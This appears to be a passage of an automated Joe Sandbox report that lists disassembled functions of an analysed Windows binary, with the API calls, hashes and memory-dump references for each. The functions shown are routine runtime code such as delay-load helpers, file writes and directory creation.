                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorLast_abort
                                                                  • String ID: pH
                                                                  • API String ID: 2991157371-1451419334
                                                                  • Opcode ID: 45e65e0e2d9fd4bb2ea249fdc7117e3573c860c50d56933074f8eb11e072546b
                                                                  • Instruction ID: b052ae0e76888aaa09679e22fa30d1ad10d89d8e1debd4eaeab38c75bafa7e42
                                                                  • Opcode Fuzzy Hash: 45e65e0e2d9fd4bb2ea249fdc7117e3573c860c50d56933074f8eb11e072546b
                                                                  • Instruction Fuzzy Hash: 2B31D531904209AFDB10EFA9C445BDE77E1EF41324F21809FE9089B2A1EB795D40CB98
                                                                  Function 0046E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: (F$PDGu<F
                                                                  • API String ID: 1269201914-873579442
                                                                  • Opcode ID: 8923a5700620aaaefff2fb4ec79a93b9fb0cd4a78b52f77c4b0bb9e86606e597
                                                                  • Instruction ID: 43350fdbe3da021d87c68cf41b5afe2069f2fbba9a706dbf92b88d26202e5916
                                                                  • Opcode Fuzzy Hash: 8923a5700620aaaefff2fb4ec79a93b9fb0cd4a78b52f77c4b0bb9e86606e597
                                                                  • Instruction Fuzzy Hash: 86B092892980407C2144714B5D02D7A0588C581B19330842FB405C2080B8490C02093B
                                                                  Function 0046E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: 2F$PDGu<F
                                                                  • API String ID: 1269201914-394011115
                                                                  • Opcode ID: 423fc8b62867e561074603566b8e20ade667dcf7ed9a5d52184d1c207b3bf4e8
                                                                  • Instruction ID: 62ab38a532786333f7a6e5c9acd4e23c9d4ec5764e026b2d3df4a5342342f173
                                                                  • Opcode Fuzzy Hash: 423fc8b62867e561074603566b8e20ade667dcf7ed9a5d52184d1c207b3bf4e8
                                                                  • Instruction Fuzzy Hash: 58B012C92580007D3144714B5C02E7F018CC4C1F19330843FF405C20C0F85C0C01093F
                                                                  Function 00459F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0045D343,00000001,?,?,?,00000000,0046551D,?,?,?), ref: 00459F9E
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0046551D,?,?,?,?,?,00464FC7,?), ref: 00459FE5
                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0045D343,00000001,?,?), ref: 0045A011
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$Handle
                                                                  • String ID:
                                                                  • API String ID: 4209713984-0
                                                                  • Opcode ID: 2ceb2eb716dc91f42b85f5c7be94776dbb45c4a9c243e07954476cc600ea0461
                                                                  • Instruction ID: 1b24a3b9f19d886a86d25dae67d617eb183e41eb9fc5b88f22dbe2c963f4f3ee
                                                                  • Opcode Fuzzy Hash: 2ceb2eb716dc91f42b85f5c7be94776dbb45c4a9c243e07954476cc600ea0461
                                                                  • Instruction Fuzzy Hash: A1318D32204305AFDB148E20D908B6F77A5EB85B16F044A1EF9419B291C779AD48CBAA
                                                                  Function 0045A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0045C27E: _wcslen.LIBCMT ref: 0045C284
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A2D9
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A30C
                                                                  • GetLastError.KERNEL32(?,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A329
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2260680371-0
                                                                  • Opcode ID: d17497c19b6f0ab8e7d4f53316fbf27984c80870d95b5ec5ef2f214009cae2f1
                                                                  • Instruction ID: 96f5dd899881d01c218e3dc1bb4222d4c30dfeb0bb2ca589014618d6124abb6e
                                                                  • Opcode Fuzzy Hash: d17497c19b6f0ab8e7d4f53316fbf27984c80870d95b5ec5ef2f214009cae2f1
                                                                  • Instruction Fuzzy Hash: 8401963150021459DF21AB768C49BBE23889F0A78FF44455BFD01D5283E76CCA9986BF
                                                                  Function 0047B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0047B8B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID:
                                                                  • API String ID: 1807457897-3916222277
                                                                  • Opcode ID: 033be34b6e0e9d52ab2f3d13cbaedd3a49b101cc91461529c44069cac3258093
                                                                  • Instruction ID: 4bba79cfefe17b2b3152b007de97a476fa8d9f28a8aad4321c5967e4bc2d9b3d
                                                                  • Opcode Fuzzy Hash: 033be34b6e0e9d52ab2f3d13cbaedd3a49b101cc91461529c44069cac3258093
                                                                  • Instruction Fuzzy Hash: 9B41FAF050424C9EDF218E258C84BFABBBDDB45304F1444EED69EC6242D339AA45DFA5
                                                                  Function 0047AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0047AFDD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: String
                                                                  • String ID: LCMapStringEx
                                                                  • API String ID: 2568140703-3893581201
                                                                  • Opcode ID: afdc2bfb687271f33b17725e6fe341430c0195784f1a2bcc1d241fa07db156fc
                                                                  • Instruction ID: ceaac1af09c01a1847d956ea2c260c63f33d603d4493d26c9d68a235d92d20d5
                                                                  • Opcode Fuzzy Hash: afdc2bfb687271f33b17725e6fe341430c0195784f1a2bcc1d241fa07db156fc
                                                                  • Instruction Fuzzy Hash: E8014C72504109BBCF02AF91DC01DEE7F62EF48754F11855AFE1825160CA3ACA31EB89
                                                                  Function 0047AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0047A56F), ref: 0047AF55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                  • String ID: InitializeCriticalSectionEx
                                                                  • API String ID: 2593887523-3084827643
                                                                  • Opcode ID: c6725f51e09f8b1677862f3e185f38c35a63b9c31c8501ad9594a2323e272c09
                                                                  • Instruction ID: b7f8f0e3381e35bf0c23e309add8415b5483e5396185eff1911415e16386e867
                                                                  • Opcode Fuzzy Hash: c6725f51e09f8b1677862f3e185f38c35a63b9c31c8501ad9594a2323e272c09
                                                                  • Instruction Fuzzy Hash: 4BF0E971645208BFCF02AF51DC16D9EBF61EF44B11B11846AFC0866260DA359E6097CE
                                                                  Function 0047ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Alloc
                                                                  • String ID: FlsAlloc
                                                                  • API String ID: 2773662609-671089009
                                                                  • Opcode ID: c34c21c1f7a4b1041a69ca7c8df5dfe3ff6638c6937a77cbf4d566a4be0bc610
                                                                  • Instruction ID: 1e000db439b7923f4fc32408ef13de3e0edf5c69e3bb228102b306ae1cedab98
                                                                  • Opcode Fuzzy Hash: c34c21c1f7a4b1041a69ca7c8df5dfe3ff6638c6937a77cbf4d566a4be0bc610
                                                                  • Instruction Fuzzy Hash: 6AE05570684208BBD211AF26DC16EAEBB51CB44B22B2104AFFC0893240CE389E1083CE
                                                                  Function 0046E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: e974cc835b3bff9215ca311b11c9dab1fdf0d4123a03e5f09bce702f63282c00
                                                                  • Instruction ID: 91f5ded161fde508626661f88f9455309176d83258077a4c6089a5b07b783aca
                                                                  • Opcode Fuzzy Hash: e974cc835b3bff9215ca311b11c9dab1fdf0d4123a03e5f09bce702f63282c00
                                                                  • Instruction Fuzzy Hash: FFB09299258100BC2104214B1852C7B014CC082B11330882FF801C1480A858AC01183B
                                                                  Function 0046E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: cd0f58969a9a19c6a3400c0bd7def36f5c66dec0353758bef4ea553b6d4d624b
                                                                  • Instruction ID: b9a9c9d919a3e13a89f33d98a20591aea50e53d8ef725fe4943fa74e0ea49746
                                                                  • Opcode Fuzzy Hash: cd0f58969a9a19c6a3400c0bd7def36f5c66dec0353758bef4ea553b6d4d624b
                                                                  • Instruction Fuzzy Hash: 6AB09299258100AC3144614B1842D7B018CC081B11330842FB805C2080A868AC011A3B
                                                                  Function 0046E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 50b79a7f7a01da1b865ddac4ffcd77bee0d0abfe32c78ff431969dbff97f8c54
                                                                  • Instruction ID: 8ca87eb71ba8e1e19512a560ab760d319c4ca6dfba137448195494d6c3153dd6
                                                                  • Opcode Fuzzy Hash: 50b79a7f7a01da1b865ddac4ffcd77bee0d0abfe32c78ff431969dbff97f8c54
                                                                  • Instruction Fuzzy Hash: E1B09299258000AC2144660B1802D7A018CC082B11330C42FF805C2180A858AC051A3B
                                                                  Function 0046E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 7c725ec1cf0c21abeb28885f09ebbd20d7492539b1dec27408cb8ccfa99385df
                                                                  • Instruction ID: 6e9dc114a90e430701bff8640290992e7aa133e5bb08f61ed8266bf69ccb8f17
                                                                  • Opcode Fuzzy Hash: 7c725ec1cf0c21abeb28885f09ebbd20d7492539b1dec27408cb8ccfa99385df
                                                                  • Instruction Fuzzy Hash: 97B09299259040BC2244610B1802D7A018DC082B11330842FF805C2080A858AC01193B
                                                                  Function 0046E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 709c7d9ea29f3a8e8c45188cc7e8446913007ee8e4b2518db38597daf14c2e0b
                                                                  • Instruction ID: db1bcac7011941bef9d4b0826b9a86d1e7e209f38f661fd2c3aac7bca2e2a453
                                                                  • Opcode Fuzzy Hash: 709c7d9ea29f3a8e8c45188cc7e8446913007ee8e4b2518db38597daf14c2e0b
                                                                  • Instruction Fuzzy Hash: 73B012E9259140FC3284720B1C02D7B018DC0C1B11330853FF805C2080F85CBC45193F
                                                                  Function 0046E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 47ff4c860defbedcefed66d5555084220b86cd887f0f8421e9a4f14bdcf36a8e
                                                                  • Instruction ID: 4901e0e03a4881fdee7680dde6c3e42d96d822127910b0f58cce8b110bc80be0
                                                                  • Opcode Fuzzy Hash: 47ff4c860defbedcefed66d5555084220b86cd887f0f8421e9a4f14bdcf36a8e
                                                                  • Instruction Fuzzy Hash: F3B012D9269040FC3244710B1C02D7B11CDC4C1B11330843FF806C2080F86CAC01193F
                                                                  Function 0046E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
